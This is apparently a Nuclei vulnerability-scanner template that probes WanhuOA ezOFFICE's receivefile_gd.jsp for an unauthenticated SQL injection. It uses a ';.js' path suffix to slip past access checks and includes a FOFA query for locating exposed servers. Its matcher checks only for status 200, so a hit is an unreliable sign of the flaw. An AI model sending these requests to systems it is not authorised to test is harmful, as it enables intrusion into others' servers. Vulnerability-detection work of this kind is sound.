id: wanhu-receivefile-gd-sqli

info:
  name: WanhuOA receivefile_gd.jsp - SQL Injection
  author: yichen
  severity: high
  description: |
    万户 ezOFFICE receivefile_gd.jsp 接口存在SQL注入，未授权的攻击者可利用此漏洞获取数据库权限，深入利用可获取服务器权限。
  reference:
    - https://blog.csdn.net/qq_41904294/article/details/141393553?spm=1001.2014.3001.5502
  verified: true
  max-request: 1
  fofa-query: app="万户网络-ezOFFICE"
  tags: wanhu,sqli


http:
- raw:
  - |+
    @timeout: 30s
    GET /defaultroot/modules/govoffice/gov_documentmanager/receivefile_gd.jsp;.js HTTP/1.1
    Host: {{Hostname}}
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate, br
    Connection: close


  matchers:
    - type: dsl
      dsl:
        - 'status_code == 200'
      condition: and
